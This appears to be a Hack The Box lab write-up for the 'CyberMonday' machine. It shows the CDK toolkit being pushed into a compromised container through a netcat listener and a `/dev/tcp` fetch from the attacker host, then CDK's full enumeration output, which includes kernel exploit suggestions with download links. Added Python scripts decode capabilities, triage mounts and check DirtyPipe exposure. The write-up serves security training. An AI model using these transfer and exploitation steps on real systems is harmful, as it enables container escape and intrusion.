CDK - Zero Dependency Container Penetration Toolkit
Running CDK after performing some basic enumeration
CDK is an open-source container penetration toolkit designed to provide stable exploitation inside slimmed-down containers without any OS dependency. It bundles useful net-tools and a number of PoCs/exploits, and helps you escape the container and take over the K8s cluster.
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ nc -lvp 2222 < /home/kali/Tools/CDK/cdk
listening on [any] 2222 ...
connect to [10.10.14.12] from cybermonday.htb [10.10.11.228] 57752
www-data@070370e2cdc4:/tmp$ cat < /dev/tcp/10.10.14.12/2222 > cdk
www-data@070370e2cdc4:/tmp$ chmod 755 ./cdk
Delivery complete
www-data@070370e2cdc4:/tmp$ ./cdk evaluate --full
CDK (Container DucK)
cdk version(gitcommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2023/08/22 17:12:59 current dir: /tmp
2023/08/22 17:12:59 current user: www-data uid: 33 gid: 33 home: /var/www
2023/08/22 17:12:59 hostname: 070370e2cdc4
2023/08/22 17:12:59 debian debian 12.0 kernel: 5.10.0-24-amd64
2023/08/22 17:12:59 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/bin/chfn
/bin/chsh
/bin/gpasswd
/bin/mount
/bin/newgrp
/bin/passwd
/bin/su
/bin/umount
[ Information Gathering - Services ]
2023/08/22 17:12:59 service found in process:
1 0 php-fpm
2023/08/22 17:12:59 service found in process:
8 1 php-fpm
2023/08/22 17:12:59 service found in process:
9 1 php-fpm
[ Information Gathering - Commands and Capabilities ]
2023/08/22 17:12:59 available commands:
curl,find,php,apt,dpkg,ssh,git,mount,gcc,g++,make,base64,perl
2023/08/22 17:12:59 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
capinh: 00000000a80425fb
capprm: 0000000000000000
capeff: 0000000000000000
capbnd: 00000000a80425fb
capamb: 0000000000000000
cap decode: 0x0000000000000000 =
[*] maybe you can exploit the capabilities below:
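The empty "cap decode" line above is not a tool glitch: CapEff is zero because www-data holds no effective capabilities at all. The set worth reading is CapBnd, which is the ceiling no process in this container can exceed, even root inside it. The following is an added example (my own code, not CDK's and not part of the original write-up) that decodes CDK's cap lines, or the CapXxx lines of /proc/<pid>/status, into names. The escape-relevant set it flags is my own selection; the sample values are the ones CDK printed above.

```python
"""Decode the capability masks CDK prints under "Commands and Capabilities".

Added example for this write-up; it is not CDK code. It accepts both CDK's
"capinh: 00000000a80425fb" lines and the "CapInh:\t00000000a80425fb" lines of
/proc/<pid>/status, and names the bits so the empty "cap decode" line can be
understood: www-data holds no effective capabilities, while the bounding set
is Docker's default 14-capability set.
"""
import re
from typing import Dict, List

# Bit index == capability number, from <linux/capability.h> (stable ABI).
CAP_NAMES: List[str] = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities that, on their own, give a well-known path out of a container
# (mount/cgroup escapes, host process injection, module loading, raw disk or
# kernel BPF access). This selection is my judgement, not CDK's list.
ESCAPE_CAPS = {"sys_admin", "sys_ptrace", "sys_module", "dac_read_search",
               "sys_rawio", "net_admin", "bpf", "perfmon", "sys_boot", "syslog"}

# Bits 0..37 exist on every kernel since 3.16; a --privileged container has all of them.
ALL_LEGACY_CAPS = 0x3fffffffff

CAP_LINE = re.compile(r"^\s*cap(inh|prm|eff|bnd|amb)\s*:\s*([0-9a-fA-F]+)\s*$",
                      re.IGNORECASE | re.MULTILINE)


def decode_caps(mask: int) -> List[str]:
    """Return the capability names set in a bitmask, in bit order."""
    names = [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]
    unknown = mask >> len(CAP_NAMES)
    if unknown:
        names.append(f"unknown_bits_0x{unknown:x}")  # kernel newer than this table
    return names


def parse_caps(text: str) -> Dict[str, int]:
    """Parse cap lines (CDK or /proc/<pid>/status style) into {set: mask}."""
    return {m.group(1).lower(): int(m.group(2), 16) for m in CAP_LINE.finditer(text)}


def assess(text: str) -> Dict[str, object]:
    """Summarise what the current process has and what the container could ever get."""
    caps = parse_caps(text)
    bounding = decode_caps(caps.get("bnd", 0))
    return {
        "effective": decode_caps(caps.get("eff", 0)),
        # Even root inside this container can never hold more than the bounding set.
        "bounding": bounding,
        "escape_caps_in_bounding": sorted(ESCAPE_CAPS & set(bounding)),
        "full_bounding_set": (caps.get("bnd", 0) & ALL_LEGACY_CAPS) == ALL_LEGACY_CAPS,
    }


# The values CDK printed for the www-data shell above.
CDK_SAMPLE = """\
capinh: 00000000a80425fb
capprm: 0000000000000000
capeff: 0000000000000000
capbnd: 00000000a80425fb
capamb: 0000000000000000
"""

if __name__ == "__main__":
    for key, value in assess(CDK_SAMPLE).items():
        print(f"{key}: {value}")
```

Run it against `cat /proc/self/status | grep ^Cap` on any box; the absence of sys_admin, sys_ptrace and sys_module in the bounding set here is what rules out the classic cgroup-release_agent, host-ptrace and module-loading escapes regardless of what user you later become inside the container.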
[ Information Gathering - Mounts ]
0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/4MBBNRGLE4F45RTUNEB4X3CNLS:/var/lib/docker/overlay2/l/HTJYO7BU2CUGS5DOBGIBELEFWP:/var/lib/docker/overlay2/l/GJQLOEAZV7TJMTKOEBMYV3MIMS:/var/lib/docker/overlay2/l/UMKIFSREWPFIRHVIJUPWZLO3XA:/var/lib/docker/overlay2/l/HLG4K26HZIYJ2JHVYIUI37EXKF:/var/lib/docker/overlay2/l/ILDR2EVZM3SLF27Z3VOX547NGL:/var/lib/docker/overlay2/l/DV2PAKLBPPAU4UBREFFEAEMN7J:/var/lib/docker/overlay2/l/XRZZIGO2I7XS2SXUZKQREDMGJM:/var/lib/docker/overlay2/l/JDHNZ6S6FTRGW22NMXKTKVYHGA:/var/lib/docker/overlay2/l/4UC6ZQDL4NUOHIMCOFIDHXLM4K:/var/lib/docker/overlay2/l/RCNKSVWBNVG7FMCTNF54JVW3OM:/var/lib/docker/overlay2/l/YKPNHAK6OQQ2F7M35KIL6ZEUES:/var/lib/docker/overlay2/l/I2E6NH6IY5Z5F2I47VMRM4OWZB:/var/lib/docker/overlay2/l/R7JEYQHDDWV4R3NHTAPX66ARV4:/var/lib/docker/overlay2/l/KWYCLHLPMY4D3S53KE74CTK52F:/var/lib/docker/overlay2/l/3F5JJZRDPWSPWFSWGYDUISX3A7:/var/lib/docker/overlay2/l/4ELQTLN4QWDXF33AEKIXTC5BFF,upperdir=/var/lib/docker/overlay2/8c5adf8369c63924fdfed69941b1f93b507ffd40ae5cb7b116963bbc3934c3bd/diff,workdir=/var/lib/docker/overlay2/8c5adf8369c63924fdfed69941b1f93b507ffd40ae5cb7b116963bbc3934c3bd/work
0:73 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:74 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:75 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:76 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:26 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:72 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
8:1 /home/john /mnt ro,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
0:54 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:73 /bus /proc/bus ro,relatime - proc proc rw
0:73 /fs /proc/fs ro,relatime - proc proc rw
0:73 /irq /proc/irq ro,relatime - proc proc rw
0:73 /sys /proc/sys ro,relatime - proc proc rw
0:73 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:102 / /proc/asound ro,relatime - tmpfs tmpfs ro
0:103 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:74 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 / /sys/firmware ro,relatime - tmpfs tmpfs ro
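The mount table is the most useful part of this dump. Three of the 8:1 entries are Docker's standard resolv.conf/hostname/hosts injections (and their path leaks the full 64-character container ID that the 12-character hostname abbreviates). The fourth is not standard: the host directory /home/john is bind-mounted at /mnt, read-only, so its .bash_history and .ssh/authorized_keys can be read but nothing under it can be written from the container. The following is an added example (my code, not CDK's and not part of the original write-up) that parses either a raw /proc/self/mountinfo or CDK's abbreviated form and separates host exposure from the container's own pseudo-filesystems. It assumes, as is normal for a root filesystem mounted with errors=remount-ro, that 8:1 (/dev/sda1) is the host's / so that the "root" field is a host path. The docker.sock line in the sample is constructed to exercise that branch; this target has no such mount.

```python
"""Triage a container's mount table for paths that reach the host.

Added example, not from CDK or the original write-up. Handles full
/proc/self/mountinfo lines ("<id> <parent> <maj:min> <root> <mountpoint>
<opts> [optional...] - <fstype> <source> <superopts>") and the abbreviated
"<maj:min> <root> <mountpoint> <opts> - ..." form CDK prints. Assumption: the
device carrying the host's root filesystem is mounted at / on the host, so the
'root' field of a bind mount from it is the host path.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Kernel-provided or Docker-provided filesystems that never expose host data by themselves.
PSEUDO_FS = {"proc", "sysfs", "tmpfs", "devpts", "mqueue", "cgroup", "cgroup2",
             "overlay", "devtmpfs", "securityfs", "debugfs", "tracefs", "fusectl"}
# Paths under which Docker keeps the resolv.conf/hostname/hosts it injects into every container.
DOCKER_MANAGED = re.compile(r"^/var/lib/docker/containers/([0-9a-f]{64})/")


@dataclass
class Mount:
    dev: str
    root: str            # path inside the source filesystem (the host path for bind mounts)
    mountpoint: str      # path inside the container
    options: Tuple[str, ...]
    fstype: str
    source: str

    @property
    def writable(self) -> bool:
        # Per-mount flag; the superblock may say rw (as /dev/sda1 does) while this mount is ro.
        return "rw" in self.options


def parse_mountinfo_line(line: str) -> Mount:
    left, sep, right = line.partition(" - ")
    if not sep:
        raise ValueError(f"not a mountinfo line: {line!r}")
    ltoks = left.split()
    if ":" not in ltoks[0]:          # full kernel format: drop mount id and parent id
        ltoks = ltoks[2:]
    dev, root, mountpoint, opts = ltoks[:4]   # optional fields (master:N etc.) are ignored
    rtoks = right.split()
    source = rtoks[1] if len(rtoks) > 1 else ""
    return Mount(dev, root, mountpoint, tuple(opts.split(",")), rtoks[0], source)


def classify(m: Mount) -> str:
    """'docker-socket', 'docker-managed', 'host-path' or 'container'."""
    if m.root.endswith("/docker.sock") or m.mountpoint.endswith("/docker.sock"):
        return "docker-socket"       # root on the host for anyone who can talk to it
    if m.fstype in PSEUDO_FS:
        return "container"
    if DOCKER_MANAGED.match(m.root):
        return "docker-managed"      # expected in every container, but leaks the container ID
    return "host-path"               # a real filesystem from the host, bind-mounted in


def triage(mountinfo_text: str) -> List[dict]:
    """Every mount that reaches outside the container's own overlay root."""
    findings = []
    for line in filter(str.strip, mountinfo_text.splitlines()):
        m = parse_mountinfo_line(line)
        kind = classify(m)
        if kind != "container":
            findings.append({"mountpoint": m.mountpoint, "host_path": m.root,
                             "device": m.source, "writable": m.writable, "kind": kind})
    return findings


def container_id(mountinfo_text: str) -> Optional[str]:
    """Recover Docker's full container ID from the injected resolv.conf/hosts bind mounts."""
    for line in filter(str.strip, mountinfo_text.splitlines()):
        hit = DOCKER_MANAGED.match(parse_mountinfo_line(line).root)
        if hit:
            return hit.group(1)
    return None


# Constructed sample: the /dev/sda1 lines from the CDK output above, the overlay root
# with its lowerdir list shortened, one proc entry, and one constructed docker.sock
# mount (not present on the target) to show that branch.
SAMPLE = """\
0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/X,upperdir=/var/lib/docker/overlay2/Y/diff
0:73 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
8:1 /home/john /mnt ro,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
0:24 /docker.sock /var/run/docker.sock rw,nosuid,nodev - tmpfs tmpfs rw,mode=755
"""

if __name__ == "__main__":
    print("container id:", container_id(SAMPLE))
    for f in triage(SAMPLE):
        print(f"{f['kind']:14} {f['mountpoint']:22} <- {f['host_path']} "
              f"({'rw' if f['writable'] else 'ro'})")
```

On the target the only host-path finding is /mnt, read-only, which is why the next step is reading what john left in that home directory rather than planting an SSH key there.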
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2023/08/22 17:12:59 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coredns: lookup any.any.svc.cluster.local. on 127.0.0.11:53: read udp 127.0.0.1:55321->127.0.0.11:53: i/o timeout
error when requesting coredns: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: read udp 127.0.0.1:56923->127.0.0.11:53: i/o timeout
[ Discovery - K8s API Server ]
2023/08/22 17:13:19 checking if api-server allows system:anonymous request.
err found while searching local k8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load k8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2023/08/22 17:13:20 failed to dial Alibaba Cloud API.
2023/08/22 17:13:21 failed to dial Azure API.
2023/08/22 17:13:22 failed to dial Google Cloud API.
2023/08/22 17:13:23 failed to dial Tencent Cloud API.
2023/08/22 17:13:24 failed to dial OpenStack API.
2023/08/22 17:13:25 failed to dial Amazon Web Services (AWS) API.
2023/08/22 17:13:26 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2023/08/22 17:13:26 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
exposure: probable
tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
download url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-0847] DirtyPipe
details: https://dirtypipe.cm4all.com/
exposure: less probable
tags: ubuntu=(20.04|21.04),debian=11
download url: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-27365] linux-iscsi
details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
exposure: less probable
tags: RHEL=8
download url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
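Two things to keep in mind before chasing any of these. First, the kernel a container reports is the host's, not the image's: the "debian 12.0" in the system info above is the image, while 5.10.0-24-amd64 is a Debian 11 (bullseye) kernel. Second, linux-exploit-suggester matches on that ABI name, and "5.10.0" says nothing about the upstream patch level; the real version on Debian lives in the build tag of /proc/version ("#1 SMP Debian 5.10.x-y"). DirtyPipe is a good illustration: it is in 5.8 up to the 5.10.102 / 5.15.25 / 5.16.11 fixes, so a 5.10.0 ABI looks affected while a current bullseye kernel is not. The following is an added example (my code, not CDK's, not LES's, and not part of the original write-up) that pulls the upstream version out of /proc/version (or Ubuntu's /proc/version_signature) and compares it with those fix points. The sample strings are constructed; the ABI/upstream pairings in them are illustrative, not captured from this target, and distro backports into other series are deliberately not modelled.

```python
"""Check whether the *running* kernel is inside the DirtyPipe (CVE-2022-0847)
affected range instead of trusting a match on the kernel ABI name.

Added example for this write-up, not CDK or linux-exploit-suggester code.
On Debian the real upstream version sits in the build tag of /proc/version
("#1 SMP Debian 5.10.x-y"), not in the 5.10.0-NN ABI name that uname -r shows;
Ubuntu publishes it as the last field of /proc/version_signature. The sample
strings below are constructed, not captured from the target.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# CVE-2022-0847: introduced in 5.8; fixed in 5.10.102, 5.15.25, 5.16.11 and in
# mainline before 5.17.0. 5.8, 5.9 and 5.11-5.14 reached EOL before the fix.
DIRTYPIPE_INTRODUCED: Version = (5, 8, 0)
DIRTYPIPE_FIXED = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
DIRTYPIPE_MAINLINE_FIXED: Version = (5, 17, 0)


def abi_version(text: str) -> Optional[Version]:
    """The first x.y.z in the string: what uname -r and LES match on (5.10.0 on Debian)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def upstream_version(text: str) -> Optional[Version]:
    """Best-effort upstream stable version; falls back to the ABI version when the
    string carries no distro build tag, so it is never less informative than abi_version."""
    # Debian: "... #1 SMP Debian 5.10.179-1 (2023-05-12)" or "... SMP PREEMPT_DYNAMIC Debian 6.1.55-1".
    # Anchoring on the "#N SMP" build tag avoids the "gcc-10 (Debian 10.2.1-6)" compiler string.
    m = re.search(r"#\d+ SMP(?: \w+)* Debian (\d+)\.(\d+)\.(\d+)-", text)
    if not m:
        # Ubuntu: /proc/version_signature is "Ubuntu 5.15.0-91.101-generic 5.15.131".
        m = re.fullmatch(r"Ubuntu \S+ (\d+)\.(\d+)\.(\d+)", text.strip())
    if m:
        return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    return abi_version(text)


def dirtypipe_status(v: Version) -> str:
    """'not-affected', 'affected' or 'patched', judged on the upstream version only.
    Distro backports are not modelled: read 'affected' as 'confirm on the box'."""
    if v < DIRTYPIPE_INTRODUCED:
        return "not-affected"
    if v >= DIRTYPIPE_MAINLINE_FIXED:
        return "patched"
    fixed = DIRTYPIPE_FIXED.get(v[:2])
    if fixed is None:
        return "affected"            # stable series that died before the fix landed
    return "patched" if v >= fixed else "affected"


def assess(text: str) -> dict:
    """Contrast the ABI-only verdict (what LES effectively gives) with the real one."""
    abi, real = abi_version(text), upstream_version(text)
    if abi is None or real is None:
        raise ValueError("no kernel version in input")
    return {"abi": abi, "upstream": real,
            "abi_only_verdict": dirtypipe_status(abi), "verdict": dirtypipe_status(real)}


# Constructed /proc/version strings; the ABI/upstream pairings are illustrative.
SAMPLES = {
    "debian-patched": ("Linux version 5.10.0-23-amd64 (debian-kernel@lists.debian.org) "
                       "(gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) "
                       "#1 SMP Debian 5.10.179-1 (2023-05-12)"),
    "debian-affected": ("Linux version 5.10.0-11-amd64 (debian-kernel@lists.debian.org) "
                        "(gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) "
                        "#1 SMP Debian 5.10.92-1 (2022-01-18)"),
    "ubuntu-signature": "Ubuntu 5.15.0-91.101-generic 5.15.131",
    "vanilla-affected": "Linux version 5.16.10 (build@host) (gcc (GCC) 11.2.0) #1 SMP PREEMPT Wed Feb 23 2022",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, assess(text))
```

The habit this encodes is `cat /proc/version` (and `/proc/version_signature` on Ubuntu) before downloading any kernel PoC into a target container: on this box the CDK hit on "5.10.0" is driven by the ABI name alone.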
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
/.bash_history - /mnt/.bash_history
/.bashrc - /mnt/.bashrc
/.ssh/ - /mnt/.ssh/authorized_keys
.git/ - /var/www/html/.git/COMMIT_EDITMSG
.git/ - /var/www/html/.git/HEAD
.git/ - /var/www/html/.git/branches
.git/ - /var/www/html/.git/config
.git/ - /var/www/html/.git/description
.git/ - /var/www/html/.git/hooks
.git/ - /var/www/html/.git/index
.git/ - /var/www/html/.git/info
.git/ - /var/www/html/.git/logs
.git/ - /var/www/html/.git/objects
.git/ - /var/www/html/.git/refs
[ Information Gathering - ASLR ]
2023/08/22 17:13:30 /proc/sys/kernel/randomize_va_space file content: 2
2023/08/22 17:13:30 ASLR is enabled.
[ Information Gathering - Cgroups ]
2023/08/22 17:13:30 /proc/1/cgroup file content:
0::/
2023/08/22 17:13:30 /proc/self/cgroup file added content (compare pid 1) :
Nothing found